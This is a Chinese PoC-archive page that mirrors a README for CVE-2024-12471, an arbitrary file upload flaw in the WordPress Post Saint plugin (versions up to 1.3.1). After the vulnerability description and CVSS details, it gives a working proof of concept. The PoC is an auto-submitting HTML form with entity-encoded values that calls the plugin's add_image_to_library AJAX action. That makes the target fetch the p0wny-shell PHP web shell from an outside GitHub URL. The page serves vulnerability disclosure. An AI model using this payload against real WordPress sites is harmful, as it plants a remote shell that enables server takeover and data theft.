支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 68092965a4f4e51d356020e68c12eaebb9e1143b

来源
https://github.com/RandomRobbieBF/CVE-2024-12471
关联漏洞
标题:WordPress plugin Post Saint 代码注入漏洞 (CVE-2024-12471)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Post Saint 1.3.1版本及之前版本存在代码注入漏洞,该漏洞源于add_image_to_library函数缺少功能检查和文件类型验证,导致任意文件上传。
Description
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload
介绍
# CVE-2024-12471
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

# Description

The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: post-saint
- **Affected Version**: 1.3.1
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12471
- **Status**: Closed

POC
---
```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
文件快照

 [4.0K]  /data/pocs/68092965a4f4e51d356020e68c12eaebb9e1143b
└── [1.8K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。